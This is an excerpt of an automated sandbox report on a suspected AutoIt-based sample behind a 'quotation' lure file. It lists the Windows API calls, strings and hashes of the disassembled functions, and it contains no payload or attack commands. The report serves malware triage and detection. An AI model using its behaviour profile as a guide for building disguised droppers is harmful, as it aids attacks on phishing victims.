                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006B28A9
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006B28B9
                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 006B2900
                                                                            • GetClientRect.USER32(00000000,?), ref: 006B290C
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 006B2955
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006B2964
                                                                            • GetStockObject.GDI32(00000011), ref: 006B2974
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 006B2978
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 006B2988
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006B2991
                                                                            • DeleteDC.GDI32(00000000), ref: 006B299A
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006B29C6
                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 006B29DD
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 006B2A1D
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006B2A31
                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 006B2A42
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 006B2A77
                                                                            • GetStockObject.GDI32(00000011), ref: 006B2A82
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006B2A8D
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 006B2A97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 3fa79591d6e7c1870785f44b57ff155f3bc614b70c663806c1fd44ae286693ea
                                                                            • Instruction ID: cd33c111674f512812b25f6d9ede597549e532b447355c9461b80211c6652144
                                                                            • Opcode Fuzzy Hash: 3fa79591d6e7c1870785f44b57ff155f3bc614b70c663806c1fd44ae286693ea
                                                                            • Instruction Fuzzy Hash: 29B152B1A40215AFDB14DF65CC49FAEBBBAEB45720F008158F915E7290DB74ED40CB94
                                                                            Function 006A4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A4AED
                                                                            • GetDriveTypeW.KERNEL32(?,006CCB68,?,\\.\,006CCC08), ref: 006A4BCA
                                                                            • SetErrorMode.KERNEL32(00000000,006CCB68,?,\\.\,006CCC08), ref: 006A4D36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: 9c103b8598afe1bc9584a60563c13e59be45f958d7315f06c7e3b7ad5729fa9e
                                                                            • Instruction ID: a5bc703407b6871ce4e9e7dfb7b20bdeeaf84bfb07b1f1ac4eebb3a0e6f00544
                                                                            • Opcode Fuzzy Hash: 9c103b8598afe1bc9584a60563c13e59be45f958d7315f06c7e3b7ad5729fa9e
                                                                            • Instruction Fuzzy Hash: 5E61A3306062099BCB04FF28CD829B877B3AF86350B248419F90BAB651DFB5DD42DF55
                                                                            Function 006C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 006C7421
                                                                            • SetTextColor.GDI32(?,?), ref: 006C7425
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 006C743B
                                                                            • GetSysColor.USER32(0000000F), ref: 006C7446
                                                                            • CreateSolidBrush.GDI32(?), ref: 006C744B
                                                                            • GetSysColor.USER32(00000011), ref: 006C7463
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 006C7471
                                                                            • SelectObject.GDI32(?,00000000), ref: 006C7482
                                                                            • SetBkColor.GDI32(?,00000000), ref: 006C748B
                                                                            • SelectObject.GDI32(?,?), ref: 006C7498
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 006C74B7
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006C74CE
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C74DB
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006C752A
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006C7554
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 006C7572
                                                                            • DrawFocusRect.USER32(?,?), ref: 006C757D
                                                                            • GetSysColor.USER32(00000011), ref: 006C758E
                                                                            • SetTextColor.GDI32(?,00000000), ref: 006C7596
                                                                            • DrawTextW.USER32(?,006C70F5,000000FF,?,00000000), ref: 006C75A8
                                                                            • SelectObject.GDI32(?,?), ref: 006C75BF
                                                                            • DeleteObject.GDI32(?), ref: 006C75CA
                                                                            • SelectObject.GDI32(?,?), ref: 006C75D0
                                                                            • DeleteObject.GDI32(?), ref: 006C75D5
                                                                            • SetTextColor.GDI32(?,?), ref: 006C75DB
                                                                            • SetBkColor.GDI32(?,?), ref: 006C75E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: c621a2db4d52dfb2164d47e41eb4b7574473df7aebbd3e9e5711ef2bfbb72add
                                                                            • Instruction ID: 0daaa593e55323864025f5ac7bdf8adec393b768d015a65e4d426331398b5f78
                                                                            • Opcode Fuzzy Hash: c621a2db4d52dfb2164d47e41eb4b7574473df7aebbd3e9e5711ef2bfbb72add
                                                                            • Instruction Fuzzy Hash: 20614B72900218AFDF019FA8DC49EEEBFBAEB09320F159115F915AB2A1D7759940CF90
                                                                            Function 006C0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 006C1128
                                                                            • GetDesktopWindow.USER32 ref: 006C113D
                                                                            • GetWindowRect.USER32(00000000), ref: 006C1144
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C1199
                                                                            • DestroyWindow.USER32(?), ref: 006C11B9
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006C11ED
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006C120B
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006C121D
                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 006C1232
                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 006C1245
                                                                            • IsWindowVisible.USER32(00000000), ref: 006C12A1
                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006C12BC
                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006C12D0
                                                                            • GetWindowRect.USER32(00000000,?), ref: 006C12E8
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 006C130E
                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 006C1328
                                                                            • CopyRect.USER32(?,?), ref: 006C133F
                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 006C13AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: 7251c9ccc3f3d383324733f4987d9067c64962360cc084df3101cfb9df13bb4d
                                                                            • Instruction ID: d000ed32ffbc9b60ef1cc1a30e66aa6f3345c697d931e119dae2901bde53f4a1
                                                                            • Opcode Fuzzy Hash: 7251c9ccc3f3d383324733f4987d9067c64962360cc084df3101cfb9df13bb4d
                                                                            • Instruction Fuzzy Hash: 0CB1AC71604340AFD740DF64C884FAABBE6FF86314F00891DF9999B262CB71E845CBA5
                                                                            Function 00648891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00648968
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00648970
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0064899B
                                                                            • GetSystemMetrics.USER32(00000008), ref: 006489A3
                                                                            • GetSystemMetrics.USER32(00000004), ref: 006489C8
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006489E5
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006489F5
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00648A28
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00648A3C
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00648A5A
                                                                            • GetStockObject.GDI32(00000011), ref: 00648A76
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00648A81
                                                                              • Part of subcall function 0064912D: GetCursorPos.USER32(?), ref: 00649141
                                                                              • Part of subcall function 0064912D: ScreenToClient.USER32(00000000,?), ref: 0064915E
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000001), ref: 00649183
                                                                              • Part of subcall function 0064912D: GetAsyncKeyState.USER32(00000002), ref: 0064919D
                                                                            • SetTimer.USER32(00000000,00000000,00000028,006490FC), ref: 00648AA8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: 01841e5bd59ddf1430f8d6c074b93393e530b4269647bce09356f9b26f0bea1d
                                                                            • Instruction ID: 0ccbb8eb4209de8f3aadc42f9254ee32abc62a0ea177f5ccb6e8d747d8939be2
                                                                            • Opcode Fuzzy Hash: 01841e5bd59ddf1430f8d6c074b93393e530b4269647bce09356f9b26f0bea1d
                                                                            • Instruction Fuzzy Hash: 5BB16B71A00209DFDB14DFA8CD45FEE3BB6FB48324F108229FA19A7290DB74A941CB55
                                                                            Function 00690D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00691114
                                                                              • Part of subcall function 006910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691120
                                                                              • Part of subcall function 006910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 0069112F
                                                                              • Part of subcall function 006910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00690B9B,?,?,?), ref: 00691136
                                                                              • Part of subcall function 006910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0069114D
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00690DF5
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00690E29
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690E40
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00690E7A
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00690E96
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00690EAD
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00690EB5
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00690EBC
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00690EDD
                                                                            • CopySid.ADVAPI32(00000000), ref: 00690EE4
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00690F13
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00690F35
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00690F47
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690F6E
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690F75
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690F7E
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690F85
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00690F8E
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690F95
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00690FA1
                                                                            • HeapFree.KERNEL32(00000000), ref: 00690FA8
                                                                              • Part of subcall function 00691193: GetProcessHeap.KERNEL32(00000008,00690BB1,?,00000000,?,00690BB1,?), ref: 006911A1
                                                                              • Part of subcall function 00691193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00690BB1,?), ref: 006911A8
                                                                              • Part of subcall function 00691193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00690BB1,?), ref: 006911B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 4175595110-0
                                                                            • Opcode ID: 1c476121ca81685487db297c0fdf98e3328de7e1ffde7b738871231ae00fa648
                                                                            • Instruction ID: e18d6cd515e11991adf6b767f200ad6a1950239baea1ddfab19d0fd75e9d1ce2
                                                                            • Opcode Fuzzy Hash: 1c476121ca81685487db297c0fdf98e3328de7e1ffde7b738871231ae00fa648
                                                                            • Instruction Fuzzy Hash: F171277290020AAFEF209FA5DC48FFEBBBEEF05310F148115E919E6691D7719A05CB60
                                                                            Function 006C0241 Relevance: 28.4, APIs: 3, Strings: 13, Instructions: 391windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 006C02E5
                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006C04C5
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 006C0504
                                                                              • Part of subcall function 0069223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00692258
                                                                              • Part of subcall function 0069223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0069228A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpper
                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                            • API String ID: 3391685005-719923060
                                                                            • Opcode ID: b01fe73d5f879ada216a6249c116ab1234b8c26aaae940c2a1beff3af4a14a46
                                                                            • Instruction ID: e0d7ea2d5901fdbe98b1b102f209c2686d415553cf5e8ce0899b213dec01fbf6
                                                                            • Opcode Fuzzy Hash: b01fe73d5f879ada216a6249c116ab1234b8c26aaae940c2a1beff3af4a14a46
                                                                            • Instruction Fuzzy Hash: 3BE17831208201DB9B58DF24C551A7AB7E7FF88314F14895DF896AB3A1DB30ED468B91
                                                                            Function 006AFE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 006AFE27
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 006AFE32
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 006AFE3D
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 006AFE48
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 006AFE53
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 006AFE5E
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 006AFE69
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 006AFE74
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 006AFE7F
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 006AFE8A
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 006AFE95
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 006AFEA0
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 006AFEAB
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 006AFEB6
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 006AFEC1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 006AFECC
                                                                            • GetCursorInfo.USER32(?), ref: 006AFEDC
                                                                            • GetLastError.KERNEL32 ref: 006AFF1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 7b80ccde24ac3fcb75dd839fd4c5b8c84cf023b008f77f7249f44739f96bad84
                                                                            • Instruction ID: 34f65eafa03be8508b337116c5d8a2725edd577ff215a328977cedff3c186e82
                                                                            • Opcode Fuzzy Hash: 7b80ccde24ac3fcb75dd839fd4c5b8c84cf023b008f77f7249f44739f96bad84
                                                                            • Instruction Fuzzy Hash: B94151B0D043196EDB109FBA8C89C6EBFE9FF05364B50452AF11DE7281DB78A9018F91
                                                                            Function 006BC3B7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 495registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BC4BD
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,006CCC08,00000000,?,00000000,?,?), ref: 006BC544
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 006BC5A4
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 006BC6B2
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 006BC7C1
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 006BC84D
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BC881
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BC88E
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 006BC960
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Value$Close$ConnectCreateRegistry
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 492116352-966354055
                                                                            • Opcode ID: 37d48d6c5167a0c8a50292dbedb4bb62fd2c8be7bb6af01a2ea3fb42b173b3d0
                                                                            • Instruction ID: 88464279d6a9e9eb1f46fc370adf4cbe2a17461566f741f5c148e96f598025c9
                                                                            • Opcode Fuzzy Hash: 37d48d6c5167a0c8a50292dbedb4bb62fd2c8be7bb6af01a2ea3fb42b173b3d0
                                                                            • Instruction Fuzzy Hash: 66126B756042019FDB54DF14C881E6AB7E6FF88724F04889DF89A9B3A2DB31ED41CB85
                                                                            Function 00695A1B Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 00695A2E
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00695A40
                                                                            • SetWindowTextW.USER32(?,?), ref: 00695A57
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00695A6C
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00695A72
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00695A82
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00695A88
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00695AA9
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00695AC3
                                                                            • GetWindowRect.USER32(?,?), ref: 00695ACC
                                                                            • SetWindowTextW.USER32(?,?), ref: 00695B6F
                                                                            • GetDesktopWindow.USER32 ref: 00695B75
                                                                            • GetWindowRect.USER32(00000000), ref: 00695B7C
                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00695BD3
                                                                            • GetClientRect.USER32(?,?), ref: 00695BE0
                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00695C05
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00695C2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
